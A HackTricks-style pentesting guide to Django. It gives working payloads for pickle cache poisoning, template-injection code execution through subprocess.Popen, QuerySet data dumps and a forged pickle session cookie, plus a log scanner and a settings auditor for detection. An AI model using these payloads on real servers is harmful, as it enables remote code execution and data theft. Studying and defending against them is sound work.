Django
Tip
Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Cache Manipulation to RCE
Django's default cache storage method is Python pickles, which can lead to RCE if untrusted input is unpickled. If an attacker can obtain write access to the cache, they can escalate this vulnerability to RCE on the underlying server.
The Django cache is stored in one of four places: Redis, memory, files, or the database. Cache stored in a Redis server or a database is the most likely attack vector (Redis injection and SQL injection), but an attacker may also be able to use a file-based cache to turn an arbitrary write into RCE. The maintainers have marked this as a non-issue. Note that the cache file folder, SQL table name, and Redis server details will vary by implementation.
With FileBasedCache, the pickled value is written to a file under CACHES['default']['LOCATION'] (often /var/tmp/django_cache/). If that directory is world-writable or attacker-controlled, dropping a malicious pickle under the expected cache key yields code execution when the app reads it:
```bash
python - <<'PY'
import pickle, os

class RCE:
    def __reduce__(self):
        return (os.system, ("id >/tmp/pwned",))

open('/var/tmp/django_cache/cache:malicious', 'wb').write(pickle.dumps(RCE(), protocol=4))
PY
```
This HackerOne report provides a great, reproducible example of exploiting Django cache stored in a SQLite database: https://hackerone.com/reports/1415436
Server-Side Template Injection (SSTI)
The Django Template Language (DTL) is Turing-complete. If user-supplied data is rendered as a template string (for example by calling Template(user_input).render(), or when |safe/format_html() remove auto-escaping), an attacker can achieve full SSTI → RCE.
Detection
1. Look for dynamic calls to Template()/Engine.from_string()/render_to_string() that include any unsanitised request data.
2. Send a time-based or arithmetic payload:
{{7*7}}
If the rendered output contains 49, the input is being evaluated by the template engine.
3. DTL is not Jinja2: arithmetic/loop payloads often trigger a TemplateSyntaxError/500 while still confirming evaluation. Polyglots such as ${{<%[%'"}}% are good crash-or-render probes.
Context exfiltration when RCE is blocked
Even when object-walking to subprocess.Popen fails, DTL still exposes the in-scope objects:
```django
{{ request }}          {# confirm SSTI #}
{{ request.META }}     {# leak Gunicorn/UWSGI headers, cookies, proxy info #}
{{ users }}            {# QuerySet in the context? #}
{{ users.0 }}          {# first row #}
{{ users.values }}     {# dumps dicts of every column (email/flags/plaintext passwords if stored) #}
```
QuerySet.values() turns rows into dictionaries, bypassing __str__ and exposing every field the queryset returns. This works even when direct Python execution is restricted.
Automation example: authenticate, grab the CSRF token, store the marker-prefixed payload in any persistent field (e.g., username/profile bio), then request a view that renders it (AJAX endpoints such as /likes/<id> are common). Parse a stable attribute (e.g., title="...") to retrieve the rendered result and iterate over payloads.
Primitives for RCE
Django blocks direct access to __import__, but the Python object graph is reachable:
```django
{{''.__class__.mro()[1].__subclasses__()}}
```
Find the index of subprocess.Popen (≈400-500, depending on the Python build) and run an arbitrary command:
```django
{{''.__class__.mro()[1].__subclasses__()[438]('id',shell=True,stdout=-1).communicate()[0]}}
```
A safer universal gadget is to iterate until cls.__name__ == 'Popen'.
The same gadget works for Debug Toolbar or Django-CMS template rendering features that mishandle user input.
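A defender-side complement to the probing steps above, as an added example that is not part of the original page: a small scanner that URL-decodes the request target of access-log lines and flags the arithmetic probe, the crash-or-render polyglot, the context-dump and the object-walk patterns discussed in this section. The log lines, the /search/ view and the signature names are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Signatures for each stage of the SSTI methodology described above.
SIGNATURES = {
    "arith_probe": re.compile(r"\{\{\s*\d+\s*[*+\-/]\s*\d+\s*\}\}"),
    "polyglot_probe": re.compile(r"\$\{\{<%\[%'\"\}\}%"),
    "context_dump": re.compile(r"\{\{\s*(?:request|users)(?:\.\w+)*\s*\}\}"),
    "object_walk": re.compile(r"__class__|__subclasses__|\.mro\(\)|__globals__"),
}
# Request line of a combined-format access log (gunicorn/nginx style).
ACCESS_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def classify(text):
    """Return the names of every signature that matches the (decoded) text."""
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def scan_access_log(lines):
    """Return (line_no, decoded_target, status, hits) for requests carrying a probe.
    A 500 next to an arithmetic or polyglot probe is still a hit: DTL raises
    TemplateSyntaxError on such input, which confirms the engine evaluated it.
    Only the request target is visible here; payloads stored through POST bodies
    (e.g. a profile bio) have to be checked at the application layer instead."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = ACCESS_LINE.search(line)
        if not m:
            continue
        target = unquote_plus(m["target"])  # payloads arrive percent-encoded
        hits = classify(target)
        if hits:
            findings.append((no, target, int(m["status"]), hits))
    return findings


# Constructed sample lines (not real traffic): a benign search, then the arithmetic
# probe, the polyglot (server answered 500), a context dump and an object-walk step.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Jan/2026:10:00:01 +0000] "GET /search/?q=django HTTP/1.1" 200 1820',
    '10.0.0.9 - - [17/Jan/2026:10:00:07 +0000] "GET /search/?q=%7B%7B7*7%7D%7D HTTP/1.1" 200 1834',
    '10.0.0.9 - - [17/Jan/2026:10:00:12 +0000] "GET /search/?q=%24%7B%7B%3C%25%5B%25%27%22%7D%7D%25 HTTP/1.1" 500 0',
    '10.0.0.9 - - [17/Jan/2026:10:00:30 +0000] "GET /search/?q=%7B%7Busers.values%7D%7D HTTP/1.1" 200 40210',
    '10.0.0.9 - - [17/Jan/2026:10:01:02 +0000] "GET /search/?q=%7B%7B%27%27.__class__.mro()%5B1%5D.__subclasses__()%7D%7D HTTP/1.1" 200 52110',
]
```

Run scan_access_log(SAMPLE_LOG) to get one tuple per suspicious request; the benign first line produces nothing.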
See also: ReportLab/xhtml2pdf PDF export RCE
Applications built on Django often bundle xhtml2pdf/ReportLab to export views as PDF. When user-controlled HTML flows into PDF generation, rl_safe_eval can evaluate expressions inside triple brackets [[[ ... ]]], allowing code execution (CVE-2023-33733). Details, payloads and mitigations:
Reportlab Xhtml2pdf Triple Brackets Expression Evaluation Rce Cve 2023 33733
Pickle-Backed Session Cookie RCE
If the setting SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer' is enabled (or a custom serializer that deserialises pickle), Django decrypts and unpickles the session cookie before calling any view code. Therefore, possessing a valid signing key (the project SECRET_KEY by default) is enough for immediate remote code execution.
Exploit Requirements
- The server uses PickleSerializer.
- The attacker knows / can guess settings.SECRET_KEY (leaks via GitHub, .env, error pages, etc.).
Proof of Concept
```python
#!/usr/bin/env python3
from django.contrib.sessions.serializers import PickleSerializer
from django.core import signing
import os

class RCE(object):
    def __reduce__(self):
        return (os.system, ("id > /tmp/pwned",))

# Sign the pickle with the leaked key so Django accepts and unpickles it
mal = signing.dumps(RCE(), key=b'SECRET_KEY_HERE', serializer=PickleSerializer)
print(f"sessionid={mal}")
```
Send the resulting cookie, and the payload executes with the privileges of the WSGI worker.
Mitigation: use the default JSONSerializer, rotate SECRET_KEY, and set SESSION_COOKIE_HTTPONLY.
High-Impact Django CVEs (2023-2025) Pentesters Should Check
- CVE-2025-48432 – Log Injection via unescaped request.path (fixed 4 Jun 2025). Lets an attacker inject newlines/ANSI codes into log files and poison downstream log analysis. Patch level ≥ 4.2.22 / 5.1.10 / 5.2.2.
- CVE-2024-42005 – Critical SQL injection in QuerySet.values()/values_list() on JSONField (CVSS 9.8). Craft JSON keys to break out of quoting and execute arbitrary SQL. Fixed in 4.2.15 / 5.0.8.
Always identify the exact framework version via the X-Frame-Options error page or the /static/admin/css/base.css hash, and test the issues above where applicable.
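As an added example (not HackTricks or Django code), an offline audit that ties together the FileBasedCache, PickleSerializer and version checks from this page: it inspects a settings dict for the pickle session serializer, a world-writable cache LOCATION and a disabled SESSION_COOKIE_HTTPONLY, and compares a Django version against the fixed releases listed above. The settings dict, the demo() values and the out-of-support rule in vulnerable_to are assumptions made for the example.

```python
import os
import stat
import tempfile

PICKLE_SERIALIZER = "django.contrib.sessions.serializers.PickleSerializer"
FILE_CACHE = "django.core.cache.backends.filebased.FileBasedCache"
# First fixed release per affected minor series, from the advisories cited below.
FIXED = {
    "CVE-2025-48432": {(4, 2): (4, 2, 22), (5, 1): (5, 1, 10), (5, 2): (5, 2, 2)},
    "CVE-2024-42005": {(4, 2): (4, 2, 15), (5, 0): (5, 0, 8)},
}

def parse_version(text):
    """'5.1.10' -> (5, 1, 10); pre-release suffixes are not handled."""
    return tuple(int(p) for p in text.split(".")[:3])

def vulnerable_to(cve, version):
    """True when `version` predates the fix for its minor series. Assumption: a
    series with no fix line of its own is unpatched if it is older than the newest
    fixed series (it was out of support) and patched if it is newer."""
    v = parse_version(version)
    fixes = FIXED[cve]
    if v[:2] not in fixes:
        return v[:2] < max(fixes)
    return v < fixes[v[:2]]

def audit(settings, version):
    """Return findings for a Django settings dict and a version string."""
    findings = []
    if settings.get("SESSION_SERIALIZER") == PICKLE_SERIALIZER:
        findings.append("SESSION_SERIALIZER is PickleSerializer: a valid signing key gives RCE")
    if not settings.get("SESSION_COOKIE_HTTPONLY", True):
        findings.append("SESSION_COOKIE_HTTPONLY is disabled")
    cache = settings.get("CACHES", {}).get("default", {})
    loc = cache.get("LOCATION", "")
    if cache.get("BACKEND") == FILE_CACHE and os.path.isdir(loc) and os.stat(loc).st_mode & stat.S_IWOTH:
        findings.append(f"FileBasedCache dir {loc} is world-writable: a planted pickle gives RCE")
    findings += [f"Django {version} is unpatched for {cve}" for cve in FIXED if vulnerable_to(cve, version)]
    return findings

def demo():
    """Constructed sample: pickle sessions, HttpOnly off, world-writable cache dir, Django 5.0.7."""
    cache_dir = tempfile.mkdtemp()
    os.chmod(cache_dir, 0o777)  # simulate the misconfiguration in a scratch dir
    settings = {
        "SESSION_SERIALIZER": PICKLE_SERIALIZER,
        "SESSION_COOKIE_HTTPONLY": False,
        "CACHES": {"default": {"BACKEND": FILE_CACHE, "LOCATION": cache_dir}},
    }
    return audit(settings, "5.0.7")
```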
References
- Django security releases – "Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432" – 4 Jun 2025.
- OP-Innovate: "Django releases security updates to address SQL injection flaw CVE-2024-42005" – 11 Aug 2024.
- 0xdf: University (HTB) – Exploiting xhtml2pdf/ReportLab CVE-2023-33733 to gain RCE and pivot into AD – https://0xdf.gitlab.io/2025/08/09/htb-university.html
- Django docs – QuerySet.values(): https://docs.djangoproject.com/en/6.0/ref/models/querysets/#values
- 0xdf: HackNet (HTB) – HTML Attribute Injection → Django SSTI → QuerySet.values data dump → Pickle FileBasedCache RCE – https://0xdf.gitlab.io/2026/01/17/htb-hacknet.html